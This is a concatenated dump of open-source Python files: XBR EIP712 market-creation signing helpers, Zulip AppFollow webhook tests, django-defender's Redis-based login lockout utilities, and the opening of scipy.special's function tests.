                },
            ],
            'EIP712MarketCreate': [{
                'name': 'chainId',
                'type': 'uint256'
            }, {
                'name': 'verifyingContract',
                'type': 'address'
            }, {
                'name': 'member',
                'type': 'address'
            }, {
                'name': 'created',
                'type': 'uint256'
            }, {
                'name': 'marketId',
                'type': 'bytes16'
            }, {
                'name': 'coin',
                'type': 'address'
            }, {
                'name': 'terms',
                'type': 'string'
            }, {
                'name': 'meta',
                'type': 'string'
            }, {
                'name': 'maker',
                'type': 'address'
            }, {
                'name': 'marketFee',
                'type': 'uint256',
            }]
        },
        'primaryType': 'EIP712MarketCreate',
        'domain': {
            'name': 'XBR',
            'version': '1',
        },
        'message': {
            'chainId': chainId,
            'verifyingContract': verifyingContract,
            'member': member,
            'created': created,
            'marketId': marketId,
            'coin': coin,
            'terms': terms,
            'meta': meta or '',
            'maker': maker,
            'marketFee': marketFee,
        }
    }

    return data
def sign_eip712_market_create(eth_privkey: bytes, chainId: int, verifyingContract: bytes, member: bytes,
                              created: int, marketId: bytes, coin: bytes, terms: str, meta: str, maker: bytes,
                              providerSecurity: int, consumerSecurity: int, marketFee: int) -> bytes:
    """
    Sign EIP712 typed "market create" data with the given private key.

    :param eth_privkey: Signing key (a raw 32 bytes Ethereum private key).
    :type eth_privkey: bytes

    :return: The signature according to EIP712 (32+32+1 raw bytes).
    :rtype: bytes
    """
    assert is_eth_privkey(eth_privkey)

    typed_data = _create_eip712_market_create(chainId, verifyingContract, member, created, marketId,
                                              coin, terms, meta, maker, providerSecurity,
                                              consumerSecurity, marketFee)
    return sign(eth_privkey, typed_data)
def recover_eip712_market_create(chainId: int, verifyingContract: bytes, member: bytes, created: int,
                                 marketId: bytes, coin: bytes, terms: str, meta: str, maker: bytes,
                                 providerSecurity: int, consumerSecurity: int, marketFee: int,
                                 signature: bytes) -> bytes:
    """
    Recover the signer address the given EIP712 signature was signed with.

    :return: The (computed) signer address the signature was signed with.
    :rtype: bytes
    """
    assert is_signature(signature)

    typed_data = _create_eip712_market_create(chainId, verifyingContract, member, created, marketId,
                                              coin, terms, meta, maker, providerSecurity,
                                              consumerSecurity, marketFee)
    return recover(typed_data, signature)
| mit |
souravbadami/zulip | zerver/webhooks/appfollow/tests.py | 24 | 2160 | # -*- coding: utf-8 -*-
from typing import Text
from zerver.lib.test_classes import WebhookTestCase
from django.test import TestCase
from zerver.webhooks.appfollow.view import convert_markdown
class AppFollowHookTests(WebhookTestCase):
    """Fixture-driven tests for the AppFollow webhook integration."""
    STREAM_NAME = 'appfollow'
    URL_TEMPLATE = u"/api/v1/external/appfollow?stream={stream}&api_key={api_key}"

    def test_sample(self):
        # type: () -> None
        # The "sample" fixture is AppFollow's self-test ping payload.
        expected_subject = "Webhook integration was successful."
        expected_message = u"""Webhook integration was successful.
Test User / Acme (Google Play)"""
        self.send_and_test_stream_message('sample', expected_subject, expected_message,
                                          content_type="application/x-www-form-urlencoded")

    def test_reviews(self):
        # type: () -> None
        # An app-store review notification, rendered into zulip markdown.
        expected_subject = "Acme - Group chat"
        expected_message = u"""Acme - Group chat
App Store, Acme Technologies, Inc.
★★★★★ United States
**Great for Information Management**
Acme enables me to manage the flow of information quite well. I only wish I could create and edit my Acme Post files in the iOS app.
*by* **Mr RESOLUTIONARY** *for v3.9*
[Permalink](http://appfollow.io/permalink) · [Add tag](http://watch.appfollow.io/add_tag)"""
        self.send_and_test_stream_message('review', expected_subject, expected_message,
                                          content_type="application/x-www-form-urlencoded")

    def get_body(self, fixture_name):
        # type: (Text) -> Text
        # Loads the named JSON fixture for the "appfollow" integration.
        return self.fixture_data("appfollow", fixture_name, file_type="json")
class ConvertMarkdownTest(TestCase):
    """Unit tests for convert_markdown's AppFollow -> zulip markup mapping."""

    def test_convert_bold(self):
        # type: () -> None
        converted = convert_markdown("*test message*")
        self.assertEqual(converted, "**test message**")

    def test_convert_italics(self):
        # type: () -> None
        converted = convert_markdown("_test message_")
        self.assertEqual(converted, "*test message*")
        converted = convert_markdown("_ spaced message _")
        self.assertEqual(converted, " *spaced message* ")

    def test_convert_strikethrough(self):
        # type: () -> None
        converted = convert_markdown("~test message~")
        self.assertEqual(converted, "~~test message~~")
| apache-2.0 |
docker-hub/django-defender | defender/utils.py | 1 | 10611 | import logging
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.core.validators import validate_ipv46_address
from django.core.exceptions import ValidationError
from .connection import get_redis_connection
from . import config
from .data import store_login_attempt
# Shared redis connection and module-level logger, created once at import time.
REDIS_SERVER = get_redis_connection()
LOG = logging.getLogger(__name__)
def is_valid_ip(ip_address):
    """Return True when *ip_address* parses as an IPv4 or IPv6 address."""
    if not ip_address:
        return False
    candidate = ip_address.strip()
    try:
        validate_ipv46_address(candidate)
    except ValidationError:
        return False
    return True
def get_ip_address_from_request(request):
    """Best-effort client IP from REMOTE_ADDR, falling back to loopback."""
    candidate = request.META.get('REMOTE_ADDR', '')
    if candidate and is_valid_ip(candidate):
        return candidate.strip()
    return '127.0.0.1'
def get_ip(request):
    """Resolve the client IP, honouring a reverse-proxy header if configured."""
    if not config.BEHIND_REVERSE_PROXY:
        return get_ip_address_from_request(request)
    # Proxy headers can carry a comma-separated chain; the first entry is
    # the originating client.
    proxied = request.META.get(config.REVERSE_PROXY_HEADER, '')
    proxied = proxied.split(",", 1)[0].strip()
    if proxied == '':
        proxied = get_ip_address_from_request(request)
    return proxied
def get_ip_attempt_cache_key(ip_address):
    """Redis key holding the failed-attempt counter for an IP."""
    return "{prefix}:failed:ip:{ip}".format(prefix=config.CACHE_PREFIX,
                                            ip=ip_address)
def get_username_attempt_cache_key(username):
    """Redis key holding the failed-attempt counter for a username."""
    return "{prefix}:failed:username:{user}".format(prefix=config.CACHE_PREFIX,
                                                    user=username)
def get_ip_blocked_cache_key(ip_address):
    """Redis key marking an IP as blocked."""
    return "{prefix}:blocked:ip:{ip}".format(prefix=config.CACHE_PREFIX,
                                             ip=ip_address)
def get_username_blocked_cache_key(username):
    """Redis key marking a username as blocked."""
    return "{prefix}:blocked:username:{user}".format(prefix=config.CACHE_PREFIX,
                                                     user=username)
def strip_keys(key_list):
    """Drop the redis key prefix, keeping only the trailing identifier.

    For example:
        ['defender:blocked:ip:ken', 'defender:blocked:ip:joffrey']
    becomes:
        ['ken', 'joffrey']
    """
    stripped = []
    for full_key in key_list:
        stripped.append(full_key.rsplit(":", 1)[-1])
    return stripped
def get_blocked_ips():
    """Return the list of IPs currently marked blocked in redis."""
    if config.DISABLE_IP_LOCKOUT:
        # IP lockout is disabled, so by definition nothing is blocked.
        return []
    pattern = get_ip_blocked_cache_key("*")
    raw_keys = [redis_key.decode('utf-8')
                for redis_key in REDIS_SERVER.keys(pattern)]
    return strip_keys(raw_keys)
def get_blocked_usernames():
    """Return the list of usernames currently marked blocked in redis."""
    pattern = get_username_blocked_cache_key("*")
    raw_keys = [redis_key.decode('utf-8')
                for redis_key in REDIS_SERVER.keys(pattern)]
    return strip_keys(raw_keys)
def increment_key(key):
    """Atomically increment *key* (refreshing its TTL) and return the new value."""
    pipe = REDIS_SERVER.pipeline()
    pipe.incr(key, 1)
    if config.COOLOFF_TIME:
        # Refresh the expiry so the counter ages out after the cooloff window.
        pipe.expire(key, config.COOLOFF_TIME)
    return pipe.execute()[0]
def get_user_attempts(request):
    """Return the number of failed attempts for this request.

    Looks up both the IP counter and the username counter and returns the
    larger of the two.
    """
    ip_address = get_ip(request)
    username = request.POST.get(config.USERNAME_FORM_FIELD, None)

    # Missing counters (None from redis) count as zero.
    ip_count = int(REDIS_SERVER.get(get_ip_attempt_cache_key(ip_address)) or 0)
    username_count = int(
        REDIS_SERVER.get(get_username_attempt_cache_key(username)) or 0)

    return max(ip_count, username_count)
def block_ip(ip_address):
    """Mark *ip_address* as blocked; no-op for empty IPs or disabled lockout."""
    if not ip_address:
        return
    if config.DISABLE_IP_LOCKOUT:
        return
    key = get_ip_blocked_cache_key(ip_address)
    expiry = config.COOLOFF_TIME
    if expiry:
        REDIS_SERVER.set(key, 'blocked', expiry)
    else:
        # No cooloff configured: block until explicitly removed.
        REDIS_SERVER.set(key, 'blocked')
def block_username(username):
    """Mark *username* as blocked; no-op for empty usernames."""
    if not username:
        return
    key = get_username_blocked_cache_key(username)
    expiry = config.COOLOFF_TIME
    if expiry:
        REDIS_SERVER.set(key, 'blocked', expiry)
    else:
        # No cooloff configured: block until explicitly removed.
        REDIS_SERVER.set(key, 'blocked')
def record_failed_attempt(ip_address, username):
    """Record a failed login attempt.

    Returns False when the actor is now over the limit (blocked), True
    otherwise.
    """
    ip_blocked = False
    if not config.DISABLE_IP_LOCKOUT:
        # Only count against the IP when IP lockout is actually in play.
        ip_attempts = increment_key(get_ip_attempt_cache_key(ip_address))
        if ip_attempts > config.FAILURE_LIMIT:
            block_ip(ip_address)
            ip_blocked = True

    username_blocked = False
    username_attempts = increment_key(get_username_attempt_cache_key(username))
    if username_attempts > config.FAILURE_LIMIT:
        block_username(username)
        username_blocked = True

    if config.DISABLE_IP_LOCKOUT:
        # Only the username counter matters; short-circuit on it alone.
        return not username_blocked

    if config.LOCKOUT_BY_IP_USERNAME:
        # Require BOTH the IP and the username to be over the limit before
        # locking out. Useful when many users share one proxy IP, so a single
        # user cannot lock out everybody behind that IP.
        return not (ip_blocked and username_blocked)

    # Default: a block on either side means the attempt is locked out.
    return not (ip_blocked or username_blocked)
def unblock_ip(ip_address, pipe=None):
    """Clear both the attempt counter and the block flag for *ip_address*.

    When *pipe* is given, the deletes are queued on it and the caller is
    responsible for executing; otherwise a private pipeline is executed here.
    """
    owns_pipe = not pipe
    if owns_pipe:
        pipe = REDIS_SERVER.pipeline()
    if ip_address:
        pipe.delete(get_ip_attempt_cache_key(ip_address))
        pipe.delete(get_ip_blocked_cache_key(ip_address))
    if owns_pipe:
        pipe.execute()
def unblock_username(username, pipe=None):
    """Clear both the attempt counter and the block flag for *username*.

    When *pipe* is given, the deletes are queued on it and the caller is
    responsible for executing; otherwise a private pipeline is executed here.
    """
    owns_pipe = not pipe
    if owns_pipe:
        pipe = REDIS_SERVER.pipeline()
    if username:
        pipe.delete(get_username_attempt_cache_key(username))
        pipe.delete(get_username_blocked_cache_key(username))
    if owns_pipe:
        pipe.execute()
def reset_failed_attempts(ip_address=None, username=None):
    """Wipe counters and block flags for the given IP and/or username at once."""
    batch = REDIS_SERVER.pipeline()
    unblock_ip(ip_address, pipe=batch)
    unblock_username(username, pipe=batch)
    batch.execute()
def lockout_response(request):
    """Build the HTTP response served to a locked-out client.

    Preference order: render the configured template, redirect to the
    configured URL, otherwise a plain-text message.
    """
    if config.LOCKOUT_TEMPLATE:
        context = {
            'cooloff_time_seconds': config.COOLOFF_TIME,
            'cooloff_time_minutes': config.COOLOFF_TIME / 60,
            'failure_limit': config.FAILURE_LIMIT,
        }
        # NOTE(review): render_to_response with context_instance is deprecated
        # in newer Django; kept as-is for compatibility with this codebase.
        return render_to_response(config.LOCKOUT_TEMPLATE, context,
                                  context_instance=RequestContext(request))

    if config.LOCKOUT_URL:
        return HttpResponseRedirect(config.LOCKOUT_URL)

    if config.COOLOFF_TIME:
        message = ("Account locked: too many login attempts. "
                   "Please try again later.")
    else:
        message = ("Account locked: too many login attempts. "
                   "Contact an admin to unlock your account.")
    return HttpResponse(message)
def is_user_already_locked(username):
    """Return a truthy value when *username* currently has a block record."""
    if username is None:
        return False
    blocked_key = get_username_blocked_cache_key(username)
    return REDIS_SERVER.get(blocked_key)
def is_source_ip_already_locked(ip_address):
    """Return a truthy value when *ip_address* currently has a block record."""
    if ip_address is None:
        return False
    if config.DISABLE_IP_LOCKOUT:
        return False
    blocked_key = get_ip_blocked_cache_key(ip_address)
    return REDIS_SERVER.get(blocked_key)
def is_already_locked(request):
    """Check whether the request's username and/or source IP is locked."""
    username = request.POST.get(config.USERNAME_FORM_FIELD, None)
    user_blocked = is_user_already_locked(username)
    ip_blocked = is_source_ip_already_locked(get_ip(request))
    if config.LOCKOUT_BY_IP_USERNAME:
        # Only treat the request as locked when BOTH identifiers are blocked.
        return ip_blocked and user_blocked
    return ip_blocked or user_blocked
def check_request(request, login_unsuccessful):
    """Process a login outcome; return False when the actor is now locked out."""
    ip_address = get_ip(request)
    username = request.POST.get(config.USERNAME_FORM_FIELD, None)

    if login_unsuccessful:
        # Count this failure (may trip the block thresholds).
        return record_failed_attempt(ip_address, username)

    # Successful login: forget any accumulated failures.
    reset_failed_attempts(ip_address=ip_address, username=username)
    return True
def add_login_attempt_to_db(request, login_valid):
    """Persist a record of this login attempt.

    Dispatches through celery when configured, otherwise stores directly.
    """
    if not config.STORE_ACCESS_ATTEMPTS:
        # Database storage is switched off; nothing to record.
        return

    user_agent = request.META.get('HTTP_USER_AGENT', '<unknown>')[:255]
    ip_address = get_ip(request)
    username = request.POST.get(config.USERNAME_FORM_FIELD, None)
    http_accept = request.META.get('HTTP_ACCEPT', '<unknown>')
    path_info = request.META.get('PATH_INFO', '<unknown>')

    if config.USE_CELERY:
        from .tasks import add_login_attempt_task
        add_login_attempt_task.delay(user_agent, ip_address, username,
                                     http_accept, path_info, login_valid)
    else:
        store_login_attempt(user_agent, ip_address, username,
                            http_accept, path_info, login_valid)
| apache-2.0 |
Event38/MissionPlanner | Lib/site-packages/scipy/special/tests/test_basic.py | 57 | 87457 | #this program corresponds to special.py
### Means test is not done yet
#E Means test is giving error (E)
#F Means test is failing (F)
#EF Means test is giving error and Failing
#! Means test is segfaulting
#8 Means test runs forever
### test_besselpoly
### test_mathieu_a
### test_mathieu_even_coef
### test_mathieu_odd_coef
### test_modfresnelp
### test_modfresnelm
# test_pbdv_seq
### test_pbvv_seq
### test_sph_harm
# test_sph_in
# test_sph_jn
# test_sph_kn
import numpy as np
from numpy import array, isnan, r_, arange, finfo, pi, sin, cos, tan, exp, log, zeros, \
sqrt, asarray, inf, nan_to_num, real, arctan, float_
from numpy.testing import assert_equal, assert_almost_equal, assert_array_equal, \
assert_array_almost_equal, assert_approx_equal, assert_, \
rand, dec, TestCase, run_module_suite, assert_allclose
from scipy import special
import scipy.special._cephes as cephes
from scipy.special._testutils import assert_tol_equal, with_special_errors
class TestCephes(TestCase):
    """Smoke tests for the raw cephes ufunc wrappers.

    Most tests only check a single easy value (often the function at 0 or 1)
    or merely that the call does not raise; methods named ``_check_*`` /
    ``__check_*`` are deliberately not collected by the test runner.
    """
    def test_airy(self):
        cephes.airy(0)
    def test_airye(self):
        cephes.airye(0)
    def test_bdtr(self):
        assert_equal(cephes.bdtr(1,1,0.5),1.0)
    def test_bdtri(self):
        assert_equal(cephes.bdtri(1,3,0.5),0.5)
    def test_bdtrc(self):
        assert_equal(cephes.bdtrc(1,3,0.5),0.5)
    def test_bdtrin(self):
        assert_equal(cephes.bdtrin(1,0,1),5.0)
    def test_bdtrik(self):
        cephes.bdtrik(1,3,0.5)
    def test_bei(self):
        assert_equal(cephes.bei(0),0.0)
    def test_beip(self):
        assert_equal(cephes.beip(0),0.0)
    def test_ber(self):
        assert_equal(cephes.ber(0),1.0)
    def test_berp(self):
        assert_equal(cephes.berp(0),0.0)
    def test_besselpoly(self):
        assert_equal(cephes.besselpoly(0,0,0),1.0)
    def test_beta(self):
        assert_equal(cephes.beta(1,1),1.0)
    def test_betainc(self):
        assert_equal(cephes.betainc(1,1,1),1.0)
    def test_betaln(self):
        assert_equal(cephes.betaln(1,1),0.0)
    def test_betaincinv(self):
        assert_equal(cephes.betaincinv(1,1,1),1.0)
    def test_btdtr(self):
        assert_equal(cephes.btdtr(1,1,1),1.0)
    def test_btdtri(self):
        assert_equal(cephes.btdtri(1,1,1),1.0)
    def test_btdtria(self):
        assert_equal(cephes.btdtria(1,1,1),5.0)
    def test_btdtrib(self):
        assert_equal(cephes.btdtrib(1,1,1),5.0)
    def test_cbrt(self):
        assert_approx_equal(cephes.cbrt(1),1.0)
    def test_chdtr(self):
        assert_equal(cephes.chdtr(1,0),0.0)
    def test_chdtrc(self):
        assert_equal(cephes.chdtrc(1,0),1.0)
    def test_chdtri(self):
        assert_equal(cephes.chdtri(1,1),0.0)
    def test_chdtriv(self):
        assert_equal(cephes.chdtriv(0,0),5.0)
    def test_chndtr(self):
        assert_equal(cephes.chndtr(0,1,0),0.0)
    def test_chndtridf(self):
        assert_equal(cephes.chndtridf(0,0,1),5.0)
    def test_chndtrinc(self):
        assert_equal(cephes.chndtrinc(0,1,0),5.0)
    def test_chndtrix(self):
        assert_equal(cephes.chndtrix(0,1,0),0.0)
    def test_cosdg(self):
        assert_equal(cephes.cosdg(0),1.0)
    def test_cosm1(self):
        assert_equal(cephes.cosm1(0),0.0)
    def test_cotdg(self):
        assert_almost_equal(cephes.cotdg(45),1.0)
    def test_dawsn(self):
        assert_equal(cephes.dawsn(0),0.0)
    def test_ellipe(self):
        assert_equal(cephes.ellipe(1),1.0)
    def test_ellipeinc(self):
        assert_equal(cephes.ellipeinc(0,1),0.0)
    def test_ellipj(self):
        cephes.ellipj(0,1)
    def test_ellipk(self):
        cephes.ellipk(0)#==pi/2
    def test_ellipkinc(self):
        assert_equal(cephes.ellipkinc(0,0),0.0)
    def test_erf(self):
        assert_equal(cephes.erf(0),0.0)
    def test_erfc(self):
        assert_equal(cephes.erfc(0),1.0)
    def test_exp1(self):
        cephes.exp1(1)
    def test_expi(self):
        cephes.expi(1)
    def test_expn(self):
        cephes.expn(1,1)
    def test_exp1_reg(self):
        # Regression for #834
        a = cephes.exp1(-complex(19.9999990))
        b = cephes.exp1(-complex(19.9999991))
        assert_array_almost_equal(a.imag, b.imag)
    def test_exp10(self):
        assert_approx_equal(cephes.exp10(2),100.0)
    def test_exp2(self):
        assert_equal(cephes.exp2(2),4.0)
    def test_expm1(self):
        assert_equal(cephes.expm1(0),0.0)
    def test_fdtr(self):
        assert_equal(cephes.fdtr(1,1,0),0.0)
    def test_fdtrc(self):
        assert_equal(cephes.fdtrc(1,1,0),1.0)
    def test_fdtri(self):
        cephes.fdtri(1,1,0.5)
    def test_fdtridfd(self):
        assert_equal(cephes.fdtridfd(1,0,0),5.0)
    def test_fresnel(self):
        assert_equal(cephes.fresnel(0),(0.0,0.0))
    def test_gamma(self):
        assert_equal(cephes.gamma(5),24.0)
    def test_gammainc(self):
        assert_equal(cephes.gammainc(5,0),0.0)
    def test_gammaincc(self):
        assert_equal(cephes.gammaincc(5,0),1.0)
    def test_gammainccinv(self):
        assert_equal(cephes.gammainccinv(5,1),0.0)
    def test_gammaln(self):
        cephes.gammaln(10)
    def test_gdtr(self):
        assert_equal(cephes.gdtr(1,1,0),0.0)
    def test_gdtrc(self):
        assert_equal(cephes.gdtrc(1,1,0),1.0)
    def test_gdtria(self):
        assert_equal(cephes.gdtria(0,1,1),0.0)
    def test_gdtrib(self):
        cephes.gdtrib(1,0,1)
        #assert_equal(cephes.gdtrib(1,0,1),5.0)
    def test_gdtrix(self):
        cephes.gdtrix(1,1,.1)
    def test_hankel1(self):
        cephes.hankel1(1,1)
    def test_hankel1e(self):
        cephes.hankel1e(1,1)
    def test_hankel2(self):
        cephes.hankel2(1,1)
    def test_hankel2e(self):
        cephes.hankel2e(1,1)
    def test_hyp1f1(self):
        assert_approx_equal(cephes.hyp1f1(1,1,1), exp(1.0))
        assert_approx_equal(cephes.hyp1f1(3,4,-6), 0.026056422099537251095)
        cephes.hyp1f1(1,1,1)
    def test_hyp1f2(self):
        cephes.hyp1f2(1,1,1,1)
    def test_hyp2f0(self):
        cephes.hyp2f0(1,1,1,1)
    def test_hyp2f1(self):
        assert_equal(cephes.hyp2f1(1,1,1,0),1.0)
    def test_hyp3f0(self):
        assert_equal(cephes.hyp3f0(1,1,1,0),(1.0,0.0))
    def test_hyperu(self):
        assert_equal(cephes.hyperu(0,1,1),1.0)
    def test_i0(self):
        assert_equal(cephes.i0(0),1.0)
    def test_i0e(self):
        assert_equal(cephes.i0e(0),1.0)
    def test_i1(self):
        assert_equal(cephes.i1(0),0.0)
    def test_i1e(self):
        assert_equal(cephes.i1e(0),0.0)
    def test_it2i0k0(self):
        cephes.it2i0k0(1)
    def test_it2j0y0(self):
        cephes.it2j0y0(1)
    def test_it2struve0(self):
        cephes.it2struve0(1)
    def test_itairy(self):
        cephes.itairy(1)
    def test_iti0k0(self):
        assert_equal(cephes.iti0k0(0),(0.0,0.0))
    def test_itj0y0(self):
        assert_equal(cephes.itj0y0(0),(0.0,0.0))
    def test_itmodstruve0(self):
        assert_equal(cephes.itmodstruve0(0),0.0)
    def test_itstruve0(self):
        assert_equal(cephes.itstruve0(0),0.0)
    def test_iv(self):
        assert_equal(cephes.iv(1,0),0.0)
    def _check_ive(self):
        assert_equal(cephes.ive(1,0),0.0)
    def test_j0(self):
        assert_equal(cephes.j0(0),1.0)
    def test_j1(self):
        assert_equal(cephes.j1(0),0.0)
    def test_jn(self):
        assert_equal(cephes.jn(0,0),1.0)
    def test_jv(self):
        assert_equal(cephes.jv(0,0),1.0)
    def _check_jve(self):
        assert_equal(cephes.jve(0,0),1.0)
    def test_k0(self):
        cephes.k0(2)
    def test_k0e(self):
        cephes.k0e(2)
    def test_k1(self):
        cephes.k1(2)
    def test_k1e(self):
        cephes.k1e(2)
    def test_kei(self):
        cephes.kei(2)
    def test_keip(self):
        assert_equal(cephes.keip(0),0.0)
    def test_ker(self):
        cephes.ker(2)
    def test_kerp(self):
        cephes.kerp(2)
    def _check_kelvin(self):
        cephes.kelvin(2)
    def test_kn(self):
        cephes.kn(1,1)
    def test_kolmogi(self):
        assert_equal(cephes.kolmogi(1),0.0)
    def test_kolmogorov(self):
        assert_equal(cephes.kolmogorov(0),1.0)
    def _check_kv(self):
        cephes.kv(1,1)
    def _check_kve(self):
        cephes.kve(1,1)
    def test_log1p(self):
        assert_equal(cephes.log1p(0),0.0)
    def test_lpmv(self):
        assert_equal(cephes.lpmv(0,0,1),1.0)
    def test_mathieu_a(self):
        assert_equal(cephes.mathieu_a(1,0),1.0)
    def test_mathieu_b(self):
        assert_equal(cephes.mathieu_b(1,0),1.0)
    def test_mathieu_cem(self):
        assert_equal(cephes.mathieu_cem(1,0,0),(1.0,0.0))
    def test_mathieu_modcem1(self):
        assert_equal(cephes.mathieu_modcem1(1,0,0),(0.0,0.0))
    def test_mathieu_modcem2(self):
        cephes.mathieu_modcem2(1,1,1)
    def test_mathieu_sem(self):
        assert_equal(cephes.mathieu_sem(1,0,0),(0.0,1.0))
    def test_mathieu_modsem1(self):
        assert_equal(cephes.mathieu_modsem1(1,0,0),(0.0,0.0))
    def test_mathieu_modsem2(self):
        cephes.mathieu_modsem2(1,1,1)
    def test_modfresnelm(self):
        cephes.modfresnelm(0)
    def test_modfresnelp(self):
        cephes.modfresnelp(0)
    def _check_modstruve(self):
        assert_equal(cephes.modstruve(1,0),0.0)
    def test_nbdtr(self):
        assert_equal(cephes.nbdtr(1,1,1),1.0)
    def test_nbdtrc(self):
        assert_equal(cephes.nbdtrc(1,1,1),0.0)
    def test_nbdtri(self):
        assert_equal(cephes.nbdtri(1,1,1),1.0)
    def __check_nbdtrik(self):
        cephes.nbdtrik(1,.4,.5)
    def test_nbdtrin(self):
        assert_equal(cephes.nbdtrin(1,0,0),5.0)
    def test_ncfdtr(self):
        assert_equal(cephes.ncfdtr(1,1,1,0),0.0)
    def test_ncfdtri(self):
        assert_equal(cephes.ncfdtri(1,1,1,0),0.0)
    def test_ncfdtridfd(self):
        cephes.ncfdtridfd(1,0.5,0,1)
    def __check_ncfdtridfn(self):
        cephes.ncfdtridfn(1,0.5,0,1)
    def __check_ncfdtrinc(self):
        cephes.ncfdtrinc(1,0.5,0,1)
    def test_nctdtr(self):
        assert_equal(cephes.nctdtr(1,0,0),0.5)
    def __check_nctdtridf(self):
        cephes.nctdtridf(1,0.5,0)
    def test_nctdtrinc(self):
        cephes.nctdtrinc(1,0,0)
    def test_nctdtrit(self):
        cephes.nctdtrit(.1,0.2,.5)
    def test_ndtr(self):
        assert_equal(cephes.ndtr(0), 0.5)
        assert_almost_equal(cephes.ndtr(1), 0.84134474606)
    def test_ndtri(self):
        assert_equal(cephes.ndtri(0.5),0.0)
    def test_nrdtrimn(self):
        assert_approx_equal(cephes.nrdtrimn(0.5,1,1),1.0)
    def test_nrdtrisd(self):
        assert_tol_equal(cephes.nrdtrisd(0.5,0.5,0.5), 0.0,
                         atol=0, rtol=0)
    def test_obl_ang1(self):
        cephes.obl_ang1(1,1,1,0)
    def test_obl_ang1_cv(self):
        result = cephes.obl_ang1_cv(1,1,1,1,0)
        assert_almost_equal(result[0],1.0)
        assert_almost_equal(result[1],0.0)
    def _check_obl_cv(self):
        assert_equal(cephes.obl_cv(1,1,0),2.0)
    def test_obl_rad1(self):
        cephes.obl_rad1(1,1,1,0)
    def test_obl_rad1_cv(self):
        cephes.obl_rad1_cv(1,1,1,1,0)
    def test_obl_rad2(self):
        cephes.obl_rad2(1,1,1,0)
    def test_obl_rad2_cv(self):
        cephes.obl_rad2_cv(1,1,1,1,0)
    def test_pbdv(self):
        assert_equal(cephes.pbdv(1,0),(0.0,1.0))
    def test_pbvv(self):
        cephes.pbvv(1,0)
    def test_pbwa(self):
        cephes.pbwa(1,0)
    def test_pdtr(self):
        cephes.pdtr(0,1)
    def test_pdtrc(self):
        cephes.pdtrc(0,1)
    def test_pdtri(self):
        cephes.pdtri(0.5,0.5)
    def test_pdtrik(self):
        cephes.pdtrik(0.5,1)
    def test_pro_ang1(self):
        cephes.pro_ang1(1,1,1,0)
    def test_pro_ang1_cv(self):
        assert_array_almost_equal(cephes.pro_ang1_cv(1,1,1,1,0),
                                  array((1.0,0.0)))
    def _check_pro_cv(self):
        assert_equal(cephes.pro_cv(1,1,0),2.0)
    def test_pro_rad1(self):
        cephes.pro_rad1(1,1,1,0.1)
    def test_pro_rad1_cv(self):
        cephes.pro_rad1_cv(1,1,1,1,0)
    def test_pro_rad2(self):
        cephes.pro_rad2(1,1,1,0)
    def test_pro_rad2_cv(self):
        cephes.pro_rad2_cv(1,1,1,1,0)
    def test_psi(self):
        cephes.psi(1)
    def test_radian(self):
        assert_equal(cephes.radian(0,0,0),0)
    def test_rgamma(self):
        assert_equal(cephes.rgamma(1),1.0)
    def test_round(self):
        assert_equal(cephes.round(3.4),3.0)
        assert_equal(cephes.round(-3.4),-3.0)
        assert_equal(cephes.round(3.6),4.0)
        assert_equal(cephes.round(-3.6),-4.0)
        assert_equal(cephes.round(3.5),4.0)
        assert_equal(cephes.round(-3.5),-4.0)
    def test_shichi(self):
        cephes.shichi(1)
    def test_sici(self):
        cephes.sici(1)
        s, c = cephes.sici(np.inf)
        assert_almost_equal(s, np.pi * 0.5)
        assert_almost_equal(c, 0)
        s, c = cephes.sici(-np.inf)
        assert_almost_equal(s, -np.pi * 0.5)
        assert_(np.isnan(c), "cosine integral(-inf) is not nan")
    def test_sindg(self):
        assert_equal(cephes.sindg(90),1.0)
    def test_smirnov(self):
        assert_equal(cephes.smirnov(1,.1),0.9)
    def test_smirnovi(self):
        assert_almost_equal(cephes.smirnov(1,cephes.smirnovi(1,0.4)),0.4)
        assert_almost_equal(cephes.smirnov(1,cephes.smirnovi(1,0.6)),0.6)
    def test_spence(self):
        assert_equal(cephes.spence(1),0.0)
    def test_stdtr(self):
        assert_equal(cephes.stdtr(1,0),0.5)
    def test_stdtridf(self):
        cephes.stdtridf(0.7,1)
    def test_stdtrit(self):
        cephes.stdtrit(1,0.7)
    def test_struve(self):
        assert_equal(cephes.struve(0,0),0.0)
    def test_tandg(self):
        assert_equal(cephes.tandg(45),1.0)
    def test_tklmbda(self):
        assert_almost_equal(cephes.tklmbda(1,1),1.0)
    def test_y0(self):
        cephes.y0(1)
    def test_y1(self):
        cephes.y1(1)
    def test_yn(self):
        cephes.yn(1,1)
    def test_yv(self):
        cephes.yv(1,1)
    def _check_yve(self):
        cephes.yve(1,1)
    def test_zeta(self):
        cephes.zeta(2,2)
    def test_zetac(self):
        assert_equal(cephes.zetac(0),-1.5)
    def test_wofz(self):
        cephes.wofz(0)
class TestAiry(TestCase):
    """Spot checks for airy/airye and the Ai/Bi zero finders."""
    def test_airy(self):
        #This tests the airy function to ensure 8 place accuracy in computation
        x = special.airy(.99)
        assert_array_almost_equal(x,array([0.13689066,-0.16050153,1.19815925,0.92046818]),8)
        x = special.airy(.41)
        assert_array_almost_equal(x,array([0.25238916,-.23480512,0.80686202,0.51053919]),8)
        x = special.airy(-.36)
        assert_array_almost_equal(x,array([0.44508477,-0.23186773,0.44939534,0.48105354]),8)
    def test_airye(self):
        # airye returns exponentially scaled values; undo the scaling on the
        # plain airy output and compare the two.
        a = special.airye(0.01)
        b = special.airy(0.01)
        b1 = [None]*4
        for n in range(2):
            b1[n] = b[n]*exp(2.0/3.0*0.01*sqrt(0.01))
        for n in range(2,4):
            b1[n] = b[n]*exp(-abs(real(2.0/3.0*0.01*sqrt(0.01))))
        assert_array_almost_equal(a,b1,6)
    def test_bi_zeros(self):
        bi = special.bi_zeros(2)
        bia = (array([-1.17371322, -3.2710930]),
               array([-2.29443968, -4.07315509]),
               array([-0.45494438, 0.39652284]),
               array([ 0.60195789 , -0.76031014]))
        assert_array_almost_equal(bi,bia,4)
    def test_ai_zeros(self):
        ai = special.ai_zeros(1)
        assert_array_almost_equal(ai,(array([-2.33810741]),
                                      array([-1.01879297]),
                                      array([ 0.5357]),
                                      array([ 0.7012])),4)
class TestAssocLaguerre(TestCase):
    """Check assoc_laguerre against evaluating the genlaguerre polynomial."""
    def test_assoc_laguerre(self):
        poly = special.genlaguerre(11, 1)
        for point in (.2, 1):
            direct = special.assoc_laguerre(point, 11, 1)
            assert_array_almost_equal(direct, poly(point), 8)
class TestBesselpoly(TestCase):
    def test_besselpoly(self):
